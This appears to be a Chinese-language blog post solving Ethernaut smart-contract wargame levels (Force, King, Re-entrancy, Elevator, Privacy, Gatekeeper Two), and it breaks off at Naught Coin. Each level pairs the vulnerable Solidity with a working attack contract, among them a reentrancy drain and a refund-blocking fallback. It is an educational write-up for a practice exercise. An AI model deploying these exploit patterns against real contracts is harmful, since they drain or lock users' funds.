

<!DOCTYPE html>
<html lang="en" data-default-color-scheme=auto>



<head>
  <meta charset="UTF-8">
  <link rel="apple-touch-icon" sizes="76x76" href="/img/avatar.png">
  <link rel="icon" href="/img/avatar.png">
  <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=5.0, shrink-to-fit=no">
  <meta http-equiv="x-ua-compatible" content="ie=edge">
  
  <meta name="theme-color" content="#2f4154">
  <meta name="author" content="xiaocai">
  <meta name="keywords" content="">
  
    <meta name="description" content="Force123456789101112131415161718&#x2F;&#x2F; SPDX-License-Identifier: MITpragma solidity ^0.8.0;contract Force &amp;#123;&#x2F;*                   MEOW ?         &#x2F;\_&#x2F;\   &#x2F;    ____&#x2F; o o \  &#x2F;~____  &#x3D;ø&#x3D; &#x2F; (______)__m_m)*&#x2F;&amp;">
<meta property="og:type" content="article">
<meta property="og:title" content="Ethernaut">
<meta property="og:url" content="http://xiaoxiaoxiaoxiaocai.github.io.com/2023/11/27/Ethernaut/index.html">
<meta property="og:site_name" content="xiaocai">
<meta property="og:description" content="Force123456789101112131415161718&#x2F;&#x2F; SPDX-License-Identifier: MITpragma solidity ^0.8.0;contract Force &amp;#123;&#x2F;*                   MEOW ?         &#x2F;\_&#x2F;\   &#x2F;    ____&#x2F; o o \  &#x2F;~____  &#x3D;ø&#x3D; &#x2F; (______)__m_m)*&#x2F;&amp;">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/xiaoxiaoxiaoxiaocai/Drawing-bed/draw-bed/202406030925537.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/xiaoxiaoxiaoxiaocai/Drawing-bed/draw-bed/202406030925539.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/xiaoxiaoxiaoxiaocai/Drawing-bed/draw-bed/202406030925540.png">
<meta property="article:published_time" content="2023-11-27T08:28:03.000Z">
<meta property="article:modified_time" content="2024-06-03T01:25:52.749Z">
<meta property="article:author" content="xiaocai">
<meta name="twitter:card" content="summary_large_image">
<meta name="twitter:image" content="https://cdn.jsdelivr.net/gh/xiaoxiaoxiaoxiaocai/Drawing-bed/draw-bed/202406030925537.png">
  
  
  
  <title>Ethernaut - xiaocai</title>

  <link  rel="stylesheet" href="https://lib.baomitu.com/twitter-bootstrap/4.6.1/css/bootstrap.min.css" />



  <link  rel="stylesheet" href="https://lib.baomitu.com/github-markdown-css/4.0.0/github-markdown.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/hint.css/2.7.0/hint.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.css" />



<!-- 主题依赖的图标库，不要自行修改 -->
<!-- Do not modify the link that theme dependent icons -->

<link rel="stylesheet" href="//at.alicdn.com/t/font_1749284_hj8rtnfg7um.css">



<link rel="stylesheet" href="//at.alicdn.com/t/font_1736178_lbnruvf0jn.css">


<link  rel="stylesheet" href="/css/main.css" />


  <link id="highlight-css" rel="stylesheet" href="/css/highlight.css" />
  
    <link id="highlight-css-dark" rel="stylesheet" href="/css/highlight-dark.css" />
  




  <script id="fluid-configs">
    var Fluid = window.Fluid || {};
    Fluid.ctx = Object.assign({}, Fluid.ctx)
    var CONFIG = {"hostname":"xiaoxiaoxiaoxiaocai.github.io.com","root":"/","version":"1.9.5","typing":{"enable":true,"typeSpeed":70,"cursorChar":"_","loop":false,"scope":[]},"anchorjs":{"enable":true,"element":"h1,h2,h3,h4,h5,h6","placement":"left","visible":"hover","icon":""},"progressbar":{"enable":true,"height_px":3,"color":"#29d","options":{"showSpinner":false,"trickleSpeed":100}},"code_language":{"enable":true,"default":"TEXT"},"copy_btn":true,"image_caption":{"enable":true},"image_zoom":{"enable":true,"img_url_replace":["",""]},"toc":{"enable":true,"placement":"right","headingSelector":"h1,h2,h3,h4,h5,h6","collapseDepth":0},"lazyload":{"enable":true,"loading_img":"/img/loading.gif","onlypost":false,"offset_factor":2},"web_analytics":{"enable":false,"follow_dnt":true,"baidu":null,"google":{"measurement_id":null},"tencent":{"sid":null,"cid":null},"woyaola":null,"cnzz":null,"leancloud":{"app_id":null,"app_key":null,"server_url":null,"path":"window.location.pathname","ignore_local":false}},"search_path":"/local-search.xml","include_content_in_search":true};

    if (CONFIG.web_analytics.follow_dnt) {
      var dntVal = navigator.doNotTrack || window.doNotTrack || navigator.msDoNotTrack;
      Fluid.ctx.dnt = dntVal && (dntVal.startsWith('1') || dntVal.startsWith('yes') || dntVal.startsWith('on'));
    }
  </script>
  <script  src="/js/utils.js" ></script>
  <script  src="/js/color-schema.js" ></script>
  


  
<meta name="generator" content="Hexo 5.4.2"></head>


<body>
  

  <header>
    

<div class="header-inner" style="height: 70vh;">
  <nav id="navbar" class="navbar fixed-top  navbar-expand-lg navbar-dark scrolling-navbar">
  <div class="container">
    <a class="navbar-brand" href="/">
      <strong>Xiaocai&#39;s blog</strong>
    </a>

    <button id="navbar-toggler-btn" class="navbar-toggler" type="button" data-toggle="collapse"
            data-target="#navbarSupportedContent"
            aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
      <div class="animated-icon"><span></span><span></span><span></span></div>
    </button>

    <!-- Collapsible content -->
    <div class="collapse navbar-collapse" id="navbarSupportedContent">
      <ul class="navbar-nav ml-auto text-center">
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/">
                <i class="iconfont icon-home-fill"></i>
                <span>Home</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/archives/">
                <i class="iconfont icon-archive-fill"></i>
                <span>Archives</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/categories/">
                <i class="iconfont icon-category-fill"></i>
                <span>Categories</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/tags/">
                <i class="iconfont icon-tags-fill"></i>
                <span>Tags</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/about/">
                <i class="iconfont icon-user-fill"></i>
                <span>About</span>
              </a>
            </li>
          
        
        
          <li class="nav-item" id="search-btn">
            <a class="nav-link" target="_self" href="javascript:;" data-toggle="modal" data-target="#modalSearch" aria-label="Search">
              <i class="iconfont icon-search"></i>
            </a>
          </li>
          
        
        
          <li class="nav-item" id="color-toggle-btn">
            <a class="nav-link" target="_self" href="javascript:;" aria-label="Color Toggle">
              <i class="iconfont icon-dark" id="color-toggle-icon"></i>
            </a>
          </li>
        
      </ul>
    </div>
  </div>
</nav>

  

<div id="banner" class="banner" parallax=true
     style="background: url('/img/wallhaven-d6v3jo_1920x1080.png') no-repeat center center; background-size: cover;">
  <div class="full-bg-img">
    <div class="mask flex-center" style="background-color: rgba(0, 0, 0, 0.3)">
      <div class="banner-text text-center fade-in-up">
        <div class="h2">
          
            <span id="subtitle" data-typed-text="Ethernaut"></span>
          
        </div>

        
          
  <div class="mt-3">
    
    
      <span class="post-meta">
        <i class="iconfont icon-date-fill" aria-hidden="true"></i>
        <time datetime="2023-11-27 16:28" pubdate>
          November 27, 2023 pm
        </time>
      </span>
    
  </div>

  <div class="mt-1">
    
      <span class="post-meta mr-2">
        <i class="iconfont icon-chart"></i>
        
          24k words
        
      </span>
    

    
      <span class="post-meta mr-2">
        <i class="iconfont icon-clock-fill"></i>
        
        
        
          201 mins
        
      </span>
    

    
    
  </div>


        
      </div>

      
    </div>
  </div>
</div>

</div>

  </header>

  <main>
    
      

<div class="container-fluid nopadding-x">
  <div class="row nomargin-x">
    <div class="side-col d-none d-lg-block col-lg-2">
      

    </div>

    <div class="col-lg-8 nopadding-x-md">
      <div class="container nopadding-x-md" id="board-ctn">
        <div id="board">
          <article class="post-content mx-auto">
            <h1 id="seo-header">Ethernaut</h1>
            
            
              <div class="markdown-body">
                
                <h3 id="Force"><a href="#Force" class="headerlink" title="Force"></a>Force</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><code class="hljs solidity">// SPDX-License-Identifier: MIT<br>pragma solidity ^0.8.0;<br><br>contract Force &#123;/*<br><br>                   MEOW ?<br>         /\_/\   /<br>    ____/ o o \<br>  /~____  =ø= /<br> (______)__m_m)<br><br>*/&#125;<br><br>contract Hack&#123;<br>  constructor(address payable _owner)payable&#123;<br>    selfdestruct( _owner);<br>  &#125;<br>&#125;<br></code></pre></td></tr></table></figure>





<h3 id="King"><a href="#King" class="headerlink" title="King"></a>King</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br></pre></td><td class="code"><pre><code class="hljs solidity">pragma solidity ^0.8.0;<br><br>contract King &#123;<br><br>  address king;<br>  uint public prize;<br>  address public owner;<br><br>  constructor() payable &#123;<br>    owner = msg.sender;  <br>    king = msg.sender;<br>    prize = msg.value;<br>  &#125;<br><br>  receive() external payable &#123;<br>    require(msg.value &gt;= prize || msg.sender == owner);<br>    payable(king).transfer(msg.value);<br>    king = msg.sender;<br>    prize = msg.value;<br>  &#125;<br><br>  function _king() public view returns (address) &#123;<br>    return king;<br>  &#125;<br>&#125;<br></code></pre></td></tr></table></figure>

<p>要求我们成为国王，并且不再改变。</p>
<h4 id="Analyse"><a href="#Analyse" class="headerlink" title="Analyse"></a>Analyse</h4><p>然而成为国王需要我们msg.value 超过上个国王的prize，并且msg.sender &#x3D;&#x3D; owner。显然第二个要求成立，但是当我们成为国王后，需要阻止别人超过我们。这时，我们发现receive函数是先转账，然后再修改成为国王的。因此，如果我们拒绝获得转账，那么就可以保持我们是国王了。</p>
<h4 id="attack"><a href="#attack" class="headerlink" title="attack"></a>attack</h4><p>我们需要先得到上个国王的prize，只需运行King合约的prize。</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br></pre></td><td class="code"><pre><code class="hljs solidity">// SPDX-License-Identifier: MIT<br>pragma solidity ^0.8.0;<br><br>contract King &#123;<br><br>  address king;<br>  uint public prize;<br>  address public owner;<br><br>  constructor() payable &#123;<br>    owner = msg.sender;  <br>    king = msg.sender;<br>    prize = msg.value;<br>  &#125;<br><br>  receive() external payable &#123;<br>    require(msg.value &gt;= prize || msg.sender == owner);<br>    payable(king).transfer(msg.value);<br>    king = msg.sender;<br>    prize = msg.value;<br>  &#125;<br><br>  function _king() public view returns (address) &#123;<br>    return king;<br>  &#125;<br>&#125;<br>contract Hack&#123;<br>  constructor(address payable target) payable&#123;<br>    uint prize= King(target).prize();<br>    (bool ok,)=target.call&#123;value: prize&#125;(&quot;&quot;);<br>    require(ok,&#x27;call.failed&#x27;);<br>  &#125;<br>  //fallback() external payable&#123;<br>  //revert();<br>  //&#125;<br>&#125;<br></code></pre></td></tr></table></figure>



<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs solidity">fallback() external payable&#123;<br>revert();<br>  &#125;<br></code></pre></td></tr></table></figure>

<p>该函数也就相当于什么的没有，即拒绝转账。</p>
<h3 id="Re-entrancy"><a href="#Re-entrancy" class="headerlink" title="Re-entrancy"></a><strong>Re-entrancy</strong></h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br></pre></td><td class="code"><pre><code class="hljs solidity">pragma solidity ^0.6.12;<br><br>import &#x27;openzeppelin-contracts-06/math/SafeMath.sol&#x27;;<br><br>contract Reentrance &#123;<br>  <br>  using SafeMath for uint256;<br>  mapping(address =&gt; uint) public balances;<br><br>  function donate(address _to) public payable &#123;<br>    balances[_to] = balances[_to].add(msg.value);<br>  &#125;<br><br>  function balanceOf(address _who) public view returns (uint balance) &#123;<br>    return balances[_who];<br>  &#125;<br><br>  function withdraw(uint _amount) public &#123;<br>    if(balances[msg.sender] &gt;= _amount) &#123;<br>      (bool result,) = msg.sender.call&#123;value:_amount&#125;(&quot;&quot;);<br>      if(result) &#123;<br>        _amount;<br>      &#125;<br>      balances[msg.sender] -= _amount;<br>    &#125;<br>  &#125;<br><br>  receive() external payable <br></code></pre></td></tr></table></figure>

<p>要求盗取所有余额。</p>
<h4 id="Analyse-1"><a href="#Analyse-1" class="headerlink" title="Analyse"></a>Analyse</h4><p>是重入攻击，漏洞在于withdraw函数。可以看到他是先调用了<code>msg.sender.call&#123;value:_amount&#125;(&quot;&quot;);</code>然后再在balance里面将存储的余额减去amount。这里就是可重入攻击的关键所在了，因为该函数在发送ether后才更新余额，所以我们可以想办法让它卡在call.value这里不断给我们发送ether，因为call的参数是空，所以会调用攻击合约的fallback函数，我们在fallback函数里面再次调用withdraw，这样套娃，就能将合约里面的钱都偷出来。</p>
<h4 id="Attack"><a href="#Attack" class="headerlink" title="Attack"></a>Attack</h4><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br></pre></td><td class="code"><pre><code class="hljs solidity">pragma solidity ^0.8.0;<br><br>interface IReentrance &#123;<br>    function withdraw(uint256 _amount) external;<br>&#125;<br><br>contract Reentrance &#123;<br>    address levelInstance;<br><br>    constructor(address _levelInstance) &#123;<br>        levelInstance = _levelInstance;<br>    &#125;<br><br>    function claim(uint256 _amount) public &#123;<br>        IReentrance(levelInstance).withdraw(_amount);<br>    &#125;<br><br>    fallback() external payable &#123;<br>        IReentrance(levelInstance).withdraw(msg.value);<br>    &#125;<br>&#125;<br></code></pre></td></tr></table></figure>

<p>还有一种是循环调用withdraw函数,并加以限制。</p>
<p>我们需要进行donate进行转账，来满足第一个条件，所以</p>
<p><img src="https://cdn.jsdelivr.net/gh/xiaoxiaoxiaoxiaocai/Drawing-bed/draw-bed/202406030925537.png" srcset="/img/loading.gif" lazyload alt="屏幕截图 2023-11-27 175711"></p>
<p>然后执行attack函数。</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br></pre></td><td class="code"><pre><code class="hljs solidity">pragma solidity ^0.8.0;<br><br>interface IReentrance &#123;<br>    function withdraw(uint256) external payable;<br>    function donate(address) external payable;<br>&#125;<br>contract Hack&#123;<br>  IReentrance private immutable target;<br>  constructor(address _target)&#123;<br>    target= IReentrance(_target);<br>  &#125;<br>  function attack() external payable&#123;<br>    target.donate&#123;value: 1e18&#125;(address(this));<br>    target.withdraw(1e18);<br>    require(address(target).balance ==0,&#x27;target balance&gt;0&#x27;);<br>    selfdestruct(payable(msg.sender));<br>  &#125;<br>  receive()external payable&#123;<br>    uint amount=min(1e18,address(target).balance);<br>    if(amount&gt;0)&#123;<br>      target.withdraw(amount);<br>    &#125;<br>  &#125;<br>  function min(uint x,uint y) private pure returns(uint)&#123;<br>    return x&lt;= y ? x : y;<br>  &#125;<br><br>&#125;<br></code></pre></td></tr></table></figure>

<h3 id="Elevator"><a href="#Elevator" class="headerlink" title="Elevator"></a><strong>Elevator</strong></h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br></pre></td><td class="code"><pre><code class="hljs solidity">pragma solidity ^0.8.0;<br><br>interface Building &#123;<br>  function isLastFloor(uint) external returns (bool);<br>&#125;<br><br><br>contract Elevator &#123;<br>  bool public top;<br>  uint public floor;<br><br>  function goTo(uint _floor) public &#123;<br>    Building building = Building(msg.sender);<br><br>    if (! building.isLastFloor(_floor)) &#123;<br>      floor = _floor;<br>      top = building.isLastFloor(floor);<br>    &#125;<br>  &#125;<br>&#125;<br><br></code></pre></td></tr></table></figure>

<p>要求到达top floor。</p>
<p>buliding是一个加载调用者得知的接口。而要想达到top floor。则须经过isLastFloor的检测。然而却需要两次检测，第一次是false，第二次是true。</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br></pre></td><td class="code"><pre><code class="hljs solidity">pragma solidity ^0.8.0;<br><br>interface Building &#123;<br>  function isLastFloor(uint) external returns (bool);<br>&#125;<br><br><br>contract Elevator &#123;<br>  bool public top;<br>  uint public floor;<br><br>  function goTo(uint _floor) public &#123;<br>    Building building = Building(msg.sender);<br><br>    if (! building.isLastFloor(_floor)) &#123;<br>      floor = _floor;<br>      top = building.isLastFloor(floor);<br>    &#125;<br>  &#125;<br>&#125;<br>contract Hack&#123;<br>  Elevator private immutable target;<br>  uint public count;<br>  constructor(address _target)&#123;<br>     target=Elevator(_target);<br>  &#125;<br>  function pwn() external&#123;<br>    target.goTo(1);<br>    require(target.top(),&#x27;not top&#x27;);<br>  &#125;<br>  function isLastFloor(uint) external returns(bool)&#123;<br>    count++;<br>    return count&gt;1;<br>  &#125;<br><br><br>&#125;<br></code></pre></td></tr></table></figure>

<p>当我们调用goTo函数时Building building &#x3D; Building(msg.sender);，将是攻击合约的地址。我们创建isLastFloor，通过跟踪调用次数，来进行检验。</p>
<h3 id="Privacy"><a href="#Privacy" class="headerlink" title="Privacy"></a><strong>Privacy</strong></h3><p>要求unlock为false，</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br></pre></td><td class="code"><pre><code class="hljs solidity">pragma solidity ^0.8.0;<br><br>contract Privacy &#123;<br><br>  bool public locked = true; //1 slot0<br>  uint256 public ID = block.timestamp; // 32 slot1<br>  uint8 private flattening = 10; //2 slot2<br>  uint8 private denomination = 255; //2 slot2<br>  uint16 private awkwardness = uint16(block.timestamp); //4 slot2<br>  bytes32[3] private data; //32 slot3<br><br>  constructor(bytes32[3] memory _data) &#123;<br>    data = _data;<br>  &#125;<br>  <br>  function unlock(bytes16 _key) public &#123;<br>    require(_key == bytes16(data[2]));<br>    locked = false;<br>  &#125;<br>&#125;<br></code></pre></td></tr></table></figure>

<p>要想解开，需要使 _key &#x3D;&#x3D; bytes16(data[2]), 也就是说我们需要得到定长数组data的第三个数据。由于变量是私有的，没有getter函数可以直接调用获得存储的key。</p>
<p>但是可以使用web3库来调用。根据存储的规则，data数组为定长数组，第一个数据存储再slot3，所以data[2]存储在slot5.</p>
<p><img src="https://cdn.jsdelivr.net/gh/xiaoxiaoxiaoxiaocai/Drawing-bed/draw-bed/202406030925539.png" srcset="/img/loading.gif" lazyload alt="屏幕截图 2023-11-29 222116"></p>
<p>然后需要前16个字节，两个字符为一个字节，2+2*16&#x3D;34</p>
<p><img src="https://cdn.jsdelivr.net/gh/xiaoxiaoxiaoxiaocai/Drawing-bed/draw-bed/202406030925540.png" srcset="/img/loading.gif" lazyload alt="屏幕截图 2023-11-29 222139"></p>
<p>得到密钥，然后将其合约填入并调用unlock函数即可通关。</p>
<h3 id="Gatekeeper-Two"><a href="#Gatekeeper-Two" class="headerlink" title="Gatekeeper Two"></a>Gatekeeper Two</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br></pre></td><td class="code"><pre><code class="hljs solidity">// SPDX-License-Identifier: MIT<br>pragma solidity ^0.6.0;<br><br>contract GatekeeperTwo &#123;<br><br>  address public entrant;<br><br>  modifier gateOne() &#123;<br>    require(msg.sender != tx.origin);<br>    _;<br>  &#125;<br><br>  modifier gateTwo() &#123;<br>    uint x;<br>    assembly &#123; x := extcodesize(caller()) &#125;<br>    require(x == 0);<br>    _;<br>  &#125;<br><br>  modifier gateThree(bytes8 _gateKey) &#123;<br>    require(uint64(bytes8(keccak256(abi.encodePacked(msg.sender)))) ^ uint64(_gateKey) == uint64(0) - 1);<br>    _;<br>  &#125;<br><br>  function enter(bytes8 _gateKey) public gateOne gateTwo gateThree(_gateKey) returns (bool) &#123;<br>    entrant = tx.origin;<br>    return true;<br>  &#125;<br>&#125;<br></code></pre></td></tr></table></figure>

<p>三个关卡，然后true</p>
<h4 id="Analyse-2"><a href="#Analyse-2" class="headerlink" title="Analyse"></a>Analyse</h4><p>第一关我们可以使用智能合约调用enter，而不是账号。</p>
<p>第二关，只允许外部调用，不允许合约之间调用。</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><code class="hljs solidity">modifier gateTwo() &#123;<br>   uint x;<br>   assembly &#123; x := extcodesize(caller()) &#125;<br>   require(x == 0);<br>   _;<br> &#125;<br></code></pre></td></tr></table></figure>

<p>第三关</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><code class="hljs solidity">modifier gateThree(bytes8 _gateKey) &#123;<br>    require(uint64(bytes8(keccak256(abi.encodePacked(msg.sender)))) ^ uint64(_gateKey) == uint64(0) - 1);<br>    _;<br>  &#125;<br></code></pre></td></tr></table></figure>

<p>uint64(0) – 1，为uint64最大值。</p>
<figure class="highlight stylus"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><code class="hljs stylus"><span class="hljs-function"><span class="hljs-title">bytes8</span><span class="hljs-params">(keccak256(abi.encodePacked(msg.sender)</span></span>))部分是从msg<span class="hljs-selector-class">.sender</span>(即本例中的Exploiter合约)中抽取低位的<span class="hljs-number">8</span>字节并将其转换为uint64。<br><br>指令<span class="hljs-selector-tag">a</span> ^ b是位的XOR（异或）操作。XOR 操作是这样的：如果位置上的两个位相等，将产生一个 <span class="hljs-string">&quot;0&quot;</span>，否则将产生一个 <span class="hljs-string">&quot;1&quot;</span>。为了使<span class="hljs-selector-tag">a</span> ^ <span class="hljs-selector-tag">b</span> = <span class="hljs-built_in">type</span>(uint64).max（都是<span class="hljs-number">1</span>）， b必须是a的逆数。<br><br>这意味着我们的gateKey必须是<span class="hljs-built_in">bytes8</span>(<span class="hljs-built_in">keccak256</span>(abi<span class="hljs-selector-class">.encodePacked</span>(msg.sender))的逆数。<br><br>在solidity中，没有 <span class="hljs-string">&quot;逆数&quot;</span>的操作，但我们可以通过输入数和一个只有 <span class="hljs-string">&quot;F&quot;</span>的值之间做 <span class="hljs-string">&quot;XOR &quot;</span>来重新创建它。<br></code></pre></td></tr></table></figure>

<p>所以只需计算bytes8(keccak256(abi.encodePacked(address(this)))) ^ 0xFFFFFFFFFFFFFFFF</p>
<h4 id="attack-1"><a href="#attack-1" class="headerlink" title="attack"></a>attack</h4><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><code class="hljs solidity">// SPDX-License-Identifier: MIT<br>pragma solidity ^0.8.0;<br><br>contract attack&#123;<br>  constructor(address _vum)&#123;<br>    bytes8 _key = bytes8(uint64(bytes8(keccak256(abi.encodePacked(address(this))))) ^ type(uint64).max);<br>    bytes memory payload = abi.encodeWithSignature(&quot;enter(bytes8)&quot;,_key);<br>    (bool success,)=_vum.call(payload);<br>    require(success,&quot;failed&quot;);<br>  &#125;<br>&#125;<br></code></pre></td></tr></table></figure>

<h3 id="Naught-Coin"><a href="#Naught-Coin" class="headerlink" title="Naught Coin"></a>Naught Coin</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br></pre></td><td class="code"><pre><code class="hljs solidity">// SPDX-License-Identifier: MIT<br>pragma solidity ^0.8.0;<br><br>import 